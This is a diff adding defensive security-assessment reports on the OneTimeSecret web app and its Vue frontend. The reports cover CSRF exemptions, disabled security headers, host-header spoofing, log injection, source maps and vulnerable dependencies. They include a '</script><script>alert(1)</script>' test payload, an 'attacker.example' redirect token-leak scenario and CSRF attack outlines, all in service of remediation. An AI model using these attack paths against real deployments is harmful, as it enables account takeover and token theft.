+**Impact:** A default OTS deployment ships without HSTS, X-Frame-Options, CSP, and Origin-based CSRF. **Remediation:** Flip the secure defaults — set `frame_options`, `strict_transport`, `http_origin`, `xss_header`, `path_traversal` to default-on (or to on-in-production), add a CSP header, and add `X-Content-Type-Options: nosniff` globally. Document that operators must not disable HSTS/Frame-Options in production.
+
+---
+
+## 5. CORS (OTS) — CONFIRMED — none in app code
+
+Repo-wide grep finds `Access-Control-*` only in test fixtures (Stripe VCR cassettes) and `Caddyfile-example`. No `Rack::Cors`, no reflected-origin, no wildcard+credentials in application code. The V3/V2 `OPTIONS` preflight routes (`apps/api/v3/routes.txt`) route to logic that returns JSON but do not emit CORS headers from app code. **Safe by default** (cross-origin browser calls simply fail). NEEDS-VALIDATION: confirm CORS is either intentionally absent or enforced at the proxy (Caddy) and not misconfigured there.
+
+---
+
+## 6. CSRF (OTS) — CONFIRMED — High
+
+- Token CSRF via `Rack::Protection::AuthenticityToken` (param `shrimp`, masked-token BREACH mitigation) — `lib/onetime/middleware/security.rb:120-154`. Masked token exposed to the SPA via `X-CSRF-Token` response header (`lib/onetime/middleware/csrf_response_header.rb:29-39`), mounted before Security so even 403s carry a fresh token (`middleware_stack.rb:365-368`).
+- **The `allow_if` lambda bypasses CSRF for the entire `/api/` prefix** (`security.rb:142`: `return true if req.path.start_with?('/api/')`), plus `/auth/sso/*`, `/auth/email-login`, `/billing/webhook`.
+- **Problem:** Many `/api/*` POST/PATCH/DELETE endpoints accept **`auth=sessionauth`** (cookie auth) — V3 `POST /secret/conceal|generate`, `PATCH/POST /receipt/:id` (`apps/api/v3/routes.txt`), V2 equivalents, and `/api/account` mutations (destroy account, change password, apitoken rotation), `/api/organizations`, `/api/domains`. The `SessionAuthStrategy` authenticates from the session cookie (`apps/api/v3/auth_strategies.rb:39`). Because the shrimp-token check is skipped for all `/api/`, **the only remaining CSRF defense for these cookie-authenticated mutations is `Rack::Protection::HttpOrigin` — which is OFF by default (§4).**
+- **Impact:** In a default deployment, a logged-in user visiting a malicious page can have state-changing API calls (e.g. account deletion, password/apitoken change, secret creation) executed with their session cookie, with no CSRF token and no Origin check. The comment "no session = no CSRF vector" (`security.rb:137-141`) is inaccurate for the session-auth `/api/*` routes.
+- **Remediation:** Do not blanket-exempt `/api/`. Exempt only stateless auth (requests presenting Basic Auth / Bearer, or with no session cookie); require the shrimp token (or a verified custom header) for cookie-authenticated API mutations. At minimum, default `http_origin` to ON.
+
+---
+
+## 7. Request size / content-type / HPP — Low/Medium
+
+- Content-Type: `Onetime::Middleware::NormalizeContentType` then `Rack::Parser` with explicit parsers for `application/json` and `application/x-www-form-urlencoded` only (`middleware_stack.rb:52-55,307-308`). Other content types are not parsed. Reasonable.
+- **No explicit request-body size cap or JSON depth/key limit in OTS app or middleware** (CONFIRMED via grep; `Rack::ContentLength` at `middleware_stack.rb:293` only sets the header, does not reject). Otto's `ValidationMiddleware` size/depth caps are **not mounted by OTS**. So body-size and JSON-bomb protection rely on Rack/Puma/proxy defaults. NEEDS-VALIDATION: Puma/Caddy `client_max_body_size`; secret-length cap in the Secret model.
+- HPP: form parsing via `Rack::Utils.parse_nested_query` (last-value-wins, Rack-standard); no custom multi-value handling that creates confusion was found.
+
+---
+
+## 8. Error handling / info disclosure / enumeration — mostly CONFIRMED-safe
+
+- **No stack traces / internal paths to clients.** Typed errors render `error.to_h` = `{error, error_type, error_key, ...}` only (`lib/onetime/errors.rb:65-72,144-151,235-244`) with safe status codes via `otto_hooks`. Unhandled 500s return the SPA shell (web) or a hardcoded `{error:'Internal Server Error'}` (auth) — backtrace logged server-side only. `RACK_ENV` defaults to `production` (`config.ru:21`).
+- Otto's own error handler is generic in production (`/home/user/otto/lib/otto/core/error_handler.rb:258-294`), uses `SecureRandom` correlation IDs, and sanitizes backtrace paths before logging (`logging_helpers.rb:152-271`). Error IDs and dev detail are gated on `Otto.env?(:dev)`.
+- OTS error handler redacts sensitive headers (Authorization, Cookie, X-API-Key, X-Auth-Token) from Sentry debug logs (`lib/onetime/error_handler.rb:72-95`).
+- **Enumeration — mitigated:** Secret retrieval raises the same `OT::MissingSecret`/404 for "does not exist" and "not viewable" (V1 `apps/api/v1/logic/secrets/show_secret.rb:27`; V2 equivalents). Login returns generic "Invalid credentials". V2/V3 Basic Auth uses a **dummy customer with a real BCrypt hash** for constant-time comparison to block username enumeration (`lib/onetime/application/auth_strategies/basic_auth_strategy.rb:42-91`). Account-creation/reset return identical messages for new vs existing accounts.
+- **Enumeration — V1 exception (Low/Medium, CONFIRMED):** V1's controller-level `authorized` does **not** use the dummy-hash mitigation — `apps/api/v1/controllers/base.rb:68-71` loads the customer and only runs `apitoken?` when the customer exists, so a non-existent username skips the (expensive) token check. This makes **V1 Basic Auth timing-distinguishable for username enumeration**. Messages are uniform (`'Invalid credentials'`), so this is timing-only. Remediation: mirror the V2/V3 dummy-customer constant-time path in V1, or deprecate V1 auth.
+
+---
+
+## 9. Additional findings
+
+### 9.1 `Rack::DetectHost` — un-harmonized trusted-proxy model (Medium, CONFIRMED)
+
+`lib/middleware/detect_host.rb` decides whether to trust forwarded **Host** headers (`X-Forwarded-Host`, `X-Original-Host`, `Apx-Incoming-Host`, RFC7239 `Forwarded`) purely on `private_ip?(env['REMOTE_ADDR'])` (`detect_host.rb:156-165,240-263`) — its **own** RFC1918/loopback check, independent of the otto 2.3.1 trusted-proxy config that the IP path was harmonized onto. The detected host is reflected into routing (`DomainStrategy`), URL generation, and into response headers `O-Display-Domain` / `O-Domain-Strategy` (`lib/onetime/middleware/domain_strategy.rb:122-149`; reflection is guarded by `basically_valid?` at `:133`, which mitigates header injection but not host confusion).
+
+**Impact:** Any client that reaches the app from a private/loopback source (sidecar, in-cluster pod, SSRF pivot, a misconfigured proxy that forwards from a private egress) can set `X-Forwarded-Host` to spoof the host → host-header injection affecting domain classification, generated links (password-reset / share URLs), and cache keys. Unlike otto's IP resolver, there is no operator-controlled CIDR allowlist here — "any private IP" is the trust boundary.
+
+Compounding: because `IPPrivacyMiddleware` runs first and rewrites `REMOTE_ADDR` to the masked client IP, `DetectHost`'s `private_ip?(REMOTE_ADDR)` actually evaluates a **rewritten** value. For a public client this is a masked-public IP (forwarded host not trusted — safe); for a private/exempt client `REMOTE_ADDR` stays private (forwarded host trusted — the spoofing window). NEEDS-VALIDATION of the exact masked value in your deployment, but the trust model is the concern.
+
+**Remediation:** Drive `DetectHost`'s trust decision from the same `Otto::Security::Config#trusted_proxy?` / `env['otto.via_trusted_proxy']` used by the IP path, and/or validate the detected host against an allowlist of configured canonical/custom domains rather than trusting any private peer.
+
+### 9.2 Multiple independent client-IP trust readers — drift risk (Low, CONFIRMED)
+
+At least four code paths make their own IP-trust decision: otto's resolver (`env['otto.client_ip']`), `DetectHost.private_ip?` (§9.1), `HealthAccessControl` using `Rack::Request#ip` directly instead of `env['otto.client_ip']` (`lib/onetime/middleware/health_access_control.rb:35,53-54`), and `Rack::Protection::IPSpoofing` (when enabled). They currently agree in the common cases because masking normalizes `REMOTE_ADDR`/XFF, but each is a separate place to get wrong on the next change. Recommend funnelling all client-IP trust reads through `env['otto.client_ip']` / `env['otto.via_trusted_proxy']`.
+
+### 9.3 Log injection of attacker-controlled username (Low, CONFIRMED)
+
+V1 `authorized` interpolates the Basic Auth username (`custid`) into log lines without newline sanitization: `OT.ld "[authorized] Attempt for '#{custid}' via #{req.client_ipaddress} (basic auth)"` (`apps/api/v1/controllers/base.rb:67`, also `:73,:81`). `custid` is fully attacker-controlled (decoded from the Authorization header). With a plain-text logger this allows CRLF log-injection / forged log lines. It is `OT.ld` (debug-level), so impact is limited to debug-enabled environments and a structured (JSON) logger neutralizes it. Remediation: strip CR/LF before logging untrusted identifiers (the codebase already has `NEWLINE_STRIP_PATTERN`).
+
+### 9.4 Public unauthenticated APIs (informational)
+
+`/api/incoming` is `noauth`-only (fully public secret submission) and V3 `/api/v3/guest/*` allows anonymous conceal/reveal/burn (`apps/api/v3/routes.txt`). These are intentional product features but, combined with §3 (no creation rate limit on V2/V3), are the surface most exposed to abuse/flooding. Pair with a creation rate limit.
+
+---
+
+## Verification status & method
+
+- **CONFIRMED** items were read directly in the cited files in this assessment.
+- **NEEDS-VALIDATION** items depend on runtime config (`config.defaults.yaml` overrides, `site.middleware.*`, `site.network.trusted_proxy.*`), the reverse-proxy (Caddy/Puma) config, or code paths not fully traced (Otto's default 500 for API apps, the exact CSP header emission path, whether the percent/utf8 middleware are mounted). Recommended next step: stand up the local app with synthetic data and confirm (a) which security headers are present on `/`, `/api/v3/...`, and an error response; (b) that a cross-origin POST with a stolen session cookie to `/api/v3/secret/conceal` succeeds without a shrimp token; (c) `X-Forwarded-Host` spoofing from a private source.

--- a/docs/security/assessment-2026-06-22/findings/05-spa-frontend.md
+++ b/docs/security/assessment-2026-06-22/findings/05-spa-frontend.md
@@ -1,0 +1,294 @@
+# SPA / Frontend Security Assessment — OneTimeSecret
+
+**Scope:** Vue 3 + TypeScript + Vite SPA (`src/`), server-rendered bootstrap via `rhales`
+(`apps/web/core/templates/`), security middleware (`lib/onetime/`, `apps/api/v1/`).
+**Branch:** `claude/vigilant-goldberg-97ijfl`
+**Date:** 2026-06-22
+**Method:** READ-ONLY source review. No files modified. Evidence cited as `file_path:line`.
+Findings marked **CONFIRMED** (verified in source) or **NEEDS-VALIDATION** (requires runtime
+confirmation or third-party dependency review).
+
+---
+
+## Executive Summary
+
+The SPA is, on the whole, well-built from a frontend-security standpoint. The core product
+surface — displaying a decrypted secret — renders the secret value as **text** (safe binding),
+never as HTML, never in the URL, and never in persistent storage. There is exactly one `v-html`
+in the application code, and it is DOMPurify-sanitized. Auth/session is HttpOnly-cookie based;
+the CSRF token lives in in-memory Pinia state, not in JS-accessible storage. A dedicated
+open-redirect validator exists and is used. No external/CDN scripts; everything is bundled
+same-origin.
+
+The most material issues are **defense-in-depth defaults that ship OFF**: CSP, X-Frame-Options,
+HSTS and all other `Rack::Protection` security headers default to **disabled** in the shipped
+config. A secondary issue is that production **source maps are generated** and decrypted secret
+values are **not explicitly cleared from SPA memory** after viewing.
+
+| # | Finding | Severity |
+|---|---------|----------|
+| 1 | CSP disabled by default (`CSP_ENABLED` default `false`) | **HIGH** |
+| 2 | X-Frame-Options / HSTS / all Rack::Protection headers disabled by default | **HIGH** |
+| 3 | Production source maps generated (`sourcemap: true`) | **MEDIUM** |
+| 4 | Decrypted secret value not cleared from SPA memory after view | **MEDIUM** |
+| 5 | `v-html` in GlobalBroadcast (DOMPurify-mitigated) | **LOW** |
+| 6 | DNS widget script injected without CSP nonce | **LOW / NEEDS-VALIDATION** |
+| 7 | `__BOOTSTRAP_ME__` server-side JSON encoding relies on rhales (dep) | **INFO / NEEDS-VALIDATION** |
+| - | XSS sinks, token storage, open-redirect, i18n-HTML, SRI | **No issue found (positive)** |
+
+---
+
+## 1. CSP Disabled by Default — HIGH (CONFIRMED)
+
+**Evidence:**
+- `etc/defaults/config.defaults.yaml:352-353`
+  ```yaml
+  csp:
+    enabled: <%= ENV['CSP_ENABLED'] == 'true' || false %>
+  ```
+- CSP header is only emitted when `site.security.csp.enabled == true`:
+  `apps/api/v1/controllers/helpers.rb:171` → `return if OT.conf.dig('site','security','csp','enabled') != true`
+
+**Detail:** When enabled, the CSP itself is **strict and well-designed**
+(`apps/api/v1/controllers/helpers.rb:176-208`):
+- `default-src 'none'`, `object-src 'none'`, `base-uri 'self'`, `form-action 'self'`,
+  `frame-ancestors 'none'`.
+- `script-src 'nonce-#{nonce}'` — **nonce-only, no `unsafe-inline`/`unsafe-eval`** for scripts
+  (comment explicitly notes omitting `unsafe-inline` so CSP Level 1 agents can't bypass the nonce).
+- The single-bundle Vite build (`vite.config.ts:249-280`, `codeSplitting: false`) exists
+  specifically to make nonce management tractable.
+- Caveat: `style-src 'self' 'unsafe-inline'` (`helpers.rb:180,196`) — inline styles allowed
+  (needed for Vite/Vue style injection); minor, low risk for a secrets app.
+
+**Impact:** Out of the box, there is **no CSP**. The single layer of strong mitigation against
+XSS — should any sink be introduced or any dependency be compromised — is absent unless the
+operator explicitly sets `CSP_ENABLED=true`. For a product whose entire value is confidentiality
+of a secret displayed in the DOM, the strict CSP should be the default-on baseline.
+
+**Remediation:** Default `CSP_ENABLED` to `true` (opt-out, not opt-in). Document the
+dev-mode relaxation that already exists (`helpers.rb:176-191`). Consider enabling the
+commented-out `require-trusted-types-for 'script'` (`helpers.rb:189,205`).
+
+---
+
+## 2. Clickjacking / Transport / Other Security Headers Disabled by Default — HIGH (CONFIRMED)
+
+**Evidence — `etc/defaults/config.defaults.yaml`:**
+- `frame_options` (X-Frame-Options, clickjacking) → `:322` default **false**
+- `strict_transport` (HSTS) → `:338` default **false**
+- `http_origin` (Origin-based CSRF) → `:314` default **false**
+- `xss_header` → `:318` default **false**
+- `path_traversal`, `cookie_tossing`, `ip_spoofing` → `:326,330,334` default **false**
+
+These keys gate the corresponding `Rack::Protection` middleware in
+`lib/onetime/middleware/security.rb:96-202` (each `use` is `next unless middleware_settings[key]`,
+`security.rb:76`).
+
+**Note on layering:** Clickjacking is partly covered *when CSP is on* via
+`frame-ancestors 'none'` (`helpers.rb:187,203`), and a `Referrer-Policy` is set client-side via
+meta tag (`apps/web/core/templates/partials/head-base.rue:7`,
+`strict-origin-when-cross-origin`). `X-Content-Type-Options: nosniff` and a `Permissions-Policy`
+are also set via meta (`head-base.rue:8-9`). But with **both** CSP and `frame_options` defaulting
+off, a default install has **neither** `X-Frame-Options` nor `frame-ancestors` — i.e. it is
+**framable / clickjackable by default**. HSTS being off by default also leaves transport
+downgrade exposure for installs not already forcing HTTPS at a proxy.
+
+**Impact:** Default deployment is embeddable in an attacker iframe (clickjacking / UI redress
+against the reveal/burn buttons), and lacks HSTS. COOP/COEP are not set anywhere
+(searched; none found).
+
+**Remediation:** Default `frame_options` and `strict_transport` to `true`
+(or DENY for frame options). Ship secure defaults; let operators opt out for niche embedding
+needs. Consider adding `Cross-Origin-Opener-Policy: same-origin`.
+
+---
+
+## 3. Production Source Maps Generated — MEDIUM (CONFIRMED)
+
+**Evidence:**
+- `vite.config.ts:283` → `sourcemap: true` (main/production build).
+- `vite.config.local.ts:38` → `sourcemap: true` (committed local build).
+
+**Mitigating factors (CONFIRMED):**
+- Sentry maps are uploaded via CI, not at build time (`vite.config.ts:219-220`), and the build
+  drops `console`/`debugger` in prod (`vite.config.ts:272-277`, `dropConsole: true`).
+- `public/web/dist/` is git-ignored (`.gitignore:52-53`), so maps are not committed to the repo.
+
+**Impact / NEEDS-VALIDATION:** Whether `.map` files are publicly served depends on
+deployment. If the static-file middleware serves `public/web/dist/assets/*.map`, the full
+un-minified source (and inline comments) is exposed to anyone, easing discovery of any future
+client-side weakness. The build emits maps unconditionally; there is no
+`sourcemap: 'hidden'` and no post-build step observed that deletes `.map` files from the
+served directory.
+
+**Remediation:** Use `sourcemap: 'hidden'` for production (emit maps for Sentry upload but
+omit the `//# sourceMappingURL` footer), or delete `*.map` from the served `dist` after CI
+uploads them to Sentry. Confirm the static-file server (`MIDDLEWARE_STATIC_FILES`,
+`config.defaults.yaml:302`) does not serve `.map` files.
+
+---
+
+## 4. Decrypted Secret Value Not Cleared From SPA Memory — MEDIUM (CONFIRMED)
+
+**Evidence:**
+- Secret value held in Pinia refs: `src/shared/stores/secretStore.ts:61-62`
+  (`record`, `details`).
+- `clear()`/`$reset()` exist and null the refs: `secretStore.ts:203-216`.
+- **No caller** of `secretStore.clear()` / `$reset()` from the reveal/display flow
+  (grep over `src/apps/secret/` and `src/shared/components/base/` returned none). The only
+  `onUnmounted` hooks in the secret-display components remove a resize listener, not the secret
+  (`src/apps/secret/components/branded/BaseSecretDisplay.vue:84-86`).
+
+**Detail:** After a recipient reveals a secret, the plaintext `record.value.secret_value`
+remains on the JS heap (and reachable via the live Pinia store) until navigation tears down the
+store, the tab closes, or GC reclaims it — none of which is explicit or guaranteed promptly.
+
+**Impact:** Extended in-memory residency of plaintext widens the window for memory-scraping,
+heap-dump, or a chained XSS to read the already-revealed value. Lower severity because reading
+it still requires code execution in the page (which CSP would block) and the secret is one-time.
+
+**Remediation:** Call `secretStore.clear()` in `onBeforeUnmount` of the secret-display
+container, and after a successful copy/burn, to proactively null the plaintext.
+
+---
+
+## 5. `v-html` in GlobalBroadcast (DOMPurify-mitigated) — LOW (CONFIRMED)
+
+**Evidence:**
+- The only application-code `v-html`: `src/shared/components/ui/GlobalBroadcast.vue:139`
+  `<span v-html="sanitizedContent"></span>`.
+- Sanitization: `GlobalBroadcast.vue:50-57` — DOMPurify with a tight allowlist
+  (`ALLOWED_TAGS: ['a']`, `ALLOWED_ATTR: ['href','target','rel','class']`).
+- Source of `content`: server bootstrap `global_banner` (admin/operator-set in Redis),
+  passed `BaseLayout.vue:56` → `:content="global_banner ?? null"`, read from
+  `bootstrapStore` (`BaseLayout.vue:20`). It is **not** end-user-controlled.
+
+**Subtlety (worth noting):** `GlobalBroadcast.vue:43-47` runs `decodeHTMLEntities()` (assigns to
+a detached `<textarea>.innerHTML` then reads `.value`) **before** `DOMPurify.sanitize()`. Order
+is correct (decode → sanitize → bind), and DOMPurify with `ALLOWED_TAGS:['a']` strips scripts/
+event handlers, so this is safe. The detached-textarea `innerHTML` write does not execute
+scripts. No `href="javascript:"` filtering is explicit, but DOMPurify blocks that by default.
+
+**Impact:** Low — requires operator/admin to set a malicious banner, and DOMPurify constrains
+output to anchors. Defense-in-depth, not a direct user-facing XSS.
+
+**Remediation:** Acceptable as-is. Optionally add `ALLOWED_URI_REGEXP` / `rel="noopener"`
+enforcement and prefer rendering banners as plain text where HTML isn't required.
+
+---
+
+## 6. DNS Widget Script Injected Without CSP Nonce — LOW / NEEDS-VALIDATION (CONFIRMED behavior)
+
+**Evidence:**
+- `src/shared/composables/useDnsWidget.ts:155-163` dynamically creates a `<script>` element
+  (`script.src = dnsWidgetJs`) and appends to `<head>` with **no `nonce` attribute**.
+- The script is a **vendored, same-origin** asset (`src/assets/approximated/dnswidget.v1.js`,
+  imported via Vite `?url` at `useDnsWidget.ts:14`) — not a remote CDN.
+- That widget uses `innerHTML`/`insertAdjacentHTML` heavily
+  (`dnswidget.v1.js:24,53,131,134,148,152,213,216,245`), but it is third-party vendor code
+  operating on DNS-verification data, not on OTS secrets, and rendered only in the
+  authenticated custom-domain admin flow.
+
+**Impact / NEEDS-VALIDATION:** Dynamically-inserted (non-parser-inserted) scripts are generally
+allowed under a nonce-based CSP even without a nonce, so this likely still loads under the strict
+CSP — but this should be confirmed at runtime with `CSP_ENABLED=true`. If it is blocked, the
+custom-domain widget breaks; if the CSP later adopts `strict-dynamic`, behavior changes again.
+Separately, the widget's own `innerHTML` sinks are a vendor-code attack surface worth tracking.
+
+**Remediation:** Attach the page nonce (`req.env['onetime.nonce']`, exposed to the SPA via
+bootstrap) to the dynamically created `<script>`/`<link>`, or load the widget statically through
+the rhales template where it receives a nonce. Track the vendored widget for upstream updates.
+
+---
+
+## 7. Server→SPA Bootstrap (`window.__BOOTSTRAP_ME__`) Encoding — INFO / NEEDS-VALIDATION
+
+**Evidence:**
+- Injection is performed by the `rhales` gem (v0.6.2, `Gemfile.lock`) via schema-driven
+  hydration: `apps/web/core/templates/index.rue:1`
+  (`<schema src="bootstrap.ts" ... window="__BOOTSTRAP_ME__">`), strategy `:earliest`
+  (`lib/onetime/initializers/configure_rhales.rb:51`), authority `:schema`
+  (`configure_rhales.rb:55`).
+- Hydration script tags carry the CSP nonce (`configure_rhales.rb:45-47`,
+  `config.nonce_header_name = 'onetime.nonce'`).
+- The SPA consumes safely: reads `window.__BOOTSTRAP_ME__`, snapshots it, then **overwrites the
+  window prop with `true`** (`src/services/bootstrap.service.ts:40-75`), and validates against a
+  Zod schema (`src/schemas/contracts/bootstrap.ts`). Direct window access is ESLint-forbidden
+  (`src/services/README.md:55`).
+- Template variables are HTML-escaped by default in rhales (`{{ }}`); only `vite_assets_html`
+  is explicitly allowlisted as raw (`configure_rhales.rb:67`, used at
+  `apps/web/core/templates/partials/head-base.rue:52` as `{{{vite_assets_html}}}`), and that
+  content is Vite-generated, not user data.
+
+**NEEDS-VALIDATION:** The exact JSON serialization/escaping of `__BOOTSTRAP_ME__` (e.g. whether
+`</script>`, `U+2028/2029`, `<!--` are escaped) is implemented inside the `rhales` gem, which is
+a dependency and **out of this repo's tracked source**. If any user-influenced field reaches the
+bootstrap payload (e.g. a custom-domain display name, locale, OG/title values), confirm rhales'
+hydration encoder neutralizes `</script>` and line-separator sequences. Recommend a runtime test:
+set a bootstrap-reachable field to `</script><script>alert(1)</script>` and inspect the rendered
+HTML. This is the single highest-value runtime check for the server→SPA boundary.
+
+---
+
+## Positive Findings (No Issue) — CONFIRMED
+
+**XSS sinks:** Searched `src/` for `v-html`, `innerHTML`, `outerHTML`,
+`dangerouslySetInnerHTML`, `document.write`, `eval`, `new Function`, `insertAdjacentHTML`.
+Only hits in app code are GlobalBroadcast (#5, sanitized) and the vendored DNS widget (#6).
+The **secret value is rendered as text**, not HTML:
+- `src/apps/secret/components/canonical/SecretDisplayCase.vue:158` →
+  `:value="record?.secret_value"` inside a `readonly <textarea>` (Vue-escaped binding).
+- `src/apps/secret/components/branded/SecretDisplayCase.vue:178` → same safe pattern.
+
+**Secret never in URL / never logged / never persisted (CONFIRMED via sub-investigation):**
+- URL path carries only the opaque `secretIdentifier`
+  (`src/apps/secret/routes/secret.ts:60`, `/secret/:secretIdentifier`); passphrase is sent in
+  the POST body, not the URL (`src/shared/stores/secretStore.ts` reveal call). No `location.hash`
+  usage for secret material.
+- No `localStorage`/`sessionStorage`/`IndexedDB` write of `secret_value`. `localReceiptStore`
+  persists only receipt metadata to sessionStorage (`src/shared/stores/localReceiptStore.ts`).
+- Copy uses the Clipboard API (`navigator.clipboard.writeText`,
+  `src/shared/composables/useClipboard.ts:24`), not `execCommand`.
+
+**Token / session storage:**
+- CSRF token (`shrimp`) lives in in-memory Pinia (`src/shared/stores/csrfStore.ts`), attached to
+  requests via `X-CSRF-Token` header (`src/plugins/axios/interceptors.ts:75`) and refreshed from
+  response headers — **not** written to localStorage/sessionStorage.
+- Session cookie is **HttpOnly** (`config.defaults.yaml:294-295`, `httponly: true`), so it is not
+  exfiltratable via JS/XSS. SameSite is `lax` (`config.defaults.yaml:293`).
+- The only items in JS-accessible storage are non-sensitive UI flags: `ots_auth_state` boolean
+  in sessionStorage (`src/shared/stores/authStore.ts:226,260`), theme/`restMode`, banner-dismiss
+  state, domain/org context, debug channel flags (`src/utils/debug.ts:19`). No tokens or secrets.
+
+**Open redirect:** A dedicated validator (`src/utils/redirect.ts`) rejects protocol-relative
+(`//`), absolute cross-origin, `javascript:`/`data:`/`vbscript:`/`file:` and `..` traversal
+(`redirect.ts:63-121`). It is used for post-auth redirects:
+`src/shared/composables/useAuth.ts:9,107` and `src/apps/session/views/MfaChallenge.vue:11,26`
+(`isValidInternalPath`). The router auth-redirect param is also explicitly checked to start with
+a single `/` (`src/router/guards.routes.ts:352-354`).
+
+**SRI / external assets:** No external/CDN `<script>` and no `integrity=` needed — the build is a
+single same-origin bundle (`vite.config.ts:249-280`); the only third-party JS (DNS widget) is
+vendored locally (#6). No dynamic import of remote code (`codeSplitting: false`,
+`preserveModules: false`, `vite.config.ts:263,268`).
+
+**i18n / locale HTML:** vue-i18n is configured with `escapeHtml: true`
+(`vite.config.ts:184-187`); no `v-html="t(...)"` / `v-html="$t(...)"` usages found, and no raw
+HTML tags detected in the generated locale bundles. Translation strings are not rendered as HTML.
+
+**Env var leakage:** Only `VITE_`-prefixed vars reach the client (`vite.config.ts:19-22,360-372`).
+`__SENTRY_RELEASE__` is a git SHA (`vite.config.ts:42-65`); no secrets baked into `define`.
+
+**Vite dev server:** `allowedHosts` is constrained to localhost + explicit env list, never `true`
+(`vite.config.ts:321-346`), addressing GHSA-vg6x-rcgg-rjx6.
+
+---
+
+## Recommended Priority Order
+
+1. **Default-on CSP** (`CSP_ENABLED=true`) — biggest single XSS mitigation for a secrets product (#1).
+2. **Default-on `frame_options` + `strict_transport`** — close default clickjacking/transport gap (#2).
+3. **Runtime-validate `__BOOTSTRAP_ME__` encoding** with a `</script>` payload (#7).
+4. **`sourcemap: 'hidden'`** (or strip `.map` from served dist) for production (#3).
+5. **Clear `secretStore` on unmount / after copy** to minimize plaintext residency (#4).
+6. Attach nonce to the dynamically injected DNS widget script; track vendored widget (#6).

--- a/docs/security/assessment-2026-06-22/findings/06-supplychain-deploy.md
+++ b/docs/security/assessment-2026-06-22/findings/06-supplychain-deploy.md
@@ -1,0 +1,157 @@
+# Security Assessment — Supply Chain, Runtime/Deployment & Secrets Handling
+
+**Target:** OneTimeSecret (`/home/user/onetimesecret`, branch `claude/vigilant-goldberg-97ijfl`, commit `ef971b0`)
+**Supporting gems (local):** `/home/user/otto` (2.3.1), `/home/user/familia` (2.10.1), `/home/user/rodauth` (2.42.0), `/home/user/rodauth-omniauth` (0.6.2)
+**Scope:** Dependency vulns, lockfile integrity, container hardening, secrets handling, config drift/deployment, sensitive-data logging, install scripts
+**Date:** 2026-06-22
+**Reviewer:** Automated defensive security assessment (authorized, read-only on tracked source)
+
+## Tooling status
+
+Outbound internet was **available** (not loopback-restricted). Both scanners ran against fresh advisory databases:
+
+- `bundler-audit` 0.9.3, ruby-advisory-db updated 2026-06-22 (1158 advisories). **CONFIRMED via tooling.**
+- `pnpm audit` (pnpm 11.8.0, Node 22.22.2) reached the GitHub advisory DB. **CONFIRMED via tooling.**
+
+All CVE/GHSA findings below are tooling-confirmed unless explicitly marked knowledge-based.
+
+---
+
+## Summary of findings by severity
+
+| # | Severity | Finding | Evidence |
+|---|----------|---------|----------|
+| 1 | HIGH | `oauth2` 2.0.18 — bearer token leak via protocol-relative redirect (reachable in SSO path) | Gemfile.lock:265 |
+| 2 | HIGH | `form-data` 4.0.5 (via `axios`) — CRLF injection; **prod dep tree** (mitigated: axios runs client-side) | pnpm-lock.yaml:3129 |
+| 3 | MEDIUM | Source maps (`.js.map`) built and shipped/served in production at `/dist` | vite.config.ts:283; static_files.rb:67; fly.toml `[[statics]]` |
+| 4 | MEDIUM | Caddy proxy image runs as **root**, base image **not digest-pinned**, no `--no-install-recommends` | docker/variants/caddy.dockerfile:85 (no USER) |
+| 5 | MEDIUM | Redis/Valkey runs with **no `requirepass`/ACL** and `--bind 0.0.0.0`; simple compose **publishes 6379 to host** | docker/compose/docker-compose.simple.yml:62-71 |
+| 6 | MEDIUM | RabbitMQ defaults to `guest:guest` in full compose | docker/compose/docker-compose.full.yml `RABBITMQ_*` |
+| 7 | LOW | Dev/test-only JS CVEs: `ws` (High DoS), `undici` (High DoS), `esbuild`, `@babel/core`, `js-yaml`, `markdown-it` | pnpm-lock.yaml |
+| 8 | LOW | `SessionDebugger` logs full response headers (incl. Set-Cookie) when `DEBUG_SESSION` set | apps/web/core/application.rb:50; session_debugger.rb:102 |
+| 9 | LOW | Legacy v1 encryption key = unsalted single-round `Base64(SHA256(secret))` | configure_familia.rb:65 |
+| 10 | INFO | `redis://CHANGEME@…` default URI is only a WARNING in one path, hard error in another | configure_familia.rb:38 vs check_redis_url.rb:23 |
+
+**Positive controls observed (no action needed):** `SECRET` has no insecure default and the app fails closed if missing (config.defaults.yaml:11, configure_familia.rb:25); secrets generated with `SecureRandom.hex(64)` + HKDF (init.rake:116,126); `.env` chmod 600 by installer (install.sh:163,205); main app/S6 images run as non-root UID 1001 and are digest-pinned; CI/test images digest-pinned; no `curl|bash`; no committed `.env`/private keys/production secrets; well-designed route-annotation-driven Sentry URL scrubbing; diagnostics, SSO, CSP, regions all default OFF.
+
+---
+
+## 1. Dependency vulnerabilities
+
+### 1.1 [HIGH — CONFIRMED] `oauth2` 2.0.18 — bearer Authorization leak via protocol-relative redirect
+- **Evidence:** `Gemfile.lock:265` `oauth2 (2.0.18)`. GHSA-pp92-crg2-gfv9. Fixed in `>= 2.0.22`.
+- **Impact:** `OAuth2::Client#request` honours a protocol-relative `Location` (`//attacker.example`) and re-sends the bearer `Authorization` header to the attacker-controlled host. `oauth2` is pulled by `omniauth-oauth2 (1.9.0)` / `omniauth-google-oauth2 (1.2.2)` (Gemfile.lock:288-295) and is **reachable in production** for any deployment that enables SSO/OmniAuth login (`apps/web/auth/config/features/omniauth.rb`, `apps/web/auth/config/hooks/omniauth.rb`). For installs with SSO disabled (the default, `AUTH_ENABLED`/SSO off) the code path is not exercised.
+- **Remediation:** `bundle update oauth2` to `>= 2.0.22`. The dependency constraint `oauth2 (>= 2.0.2, < 3)` (Gemfile.lock:294) permits this with no manifest change.
+
+### 1.2 [HIGH — CONFIRMED, partially mitigated] `form-data` 4.0.5 (transitive via `axios`)
+- **Evidence:** `pnpm-lock.yaml:3129` `form-data@4.0.5`. GHSA-hmw2-7cc7-3qxx. Fixed in `>= 4.0.6`. `pnpm audit --prod` reports this as the **only production-tree** JS finding; paths `.>axios>form-data` and `.>@vueuse/integrations>axios>form-data`.
+- **Impact:** CRLF injection via unescaped multipart field names/filenames. **Mitigation:** `axios` is consumed only by the **browser** bundle (`src/shared/stores/*`, `src/shared/composables/useApi.ts`); `form-data` is axios's Node-runtime multipart helper and is not used by the browser XHR/fetch adapter, so practical exploitability in this app is low. Still flagged HIGH by the scanner and should be patched as defence-in-depth and to clear the prod-tree alert.
+- **Remediation:** Bump `axios` (`^1.16.0` → latest 1.x) so it resolves `form-data >= 4.0.6`; or add a pnpm `overrides` entry `"form-data": ">=4.0.6"` in `pnpm-workspace.yaml` (note: existing overrides block already present).
+
+### 1.3 [LOW — CONFIRMED] Dev/test-only JS advisories (not in production image)
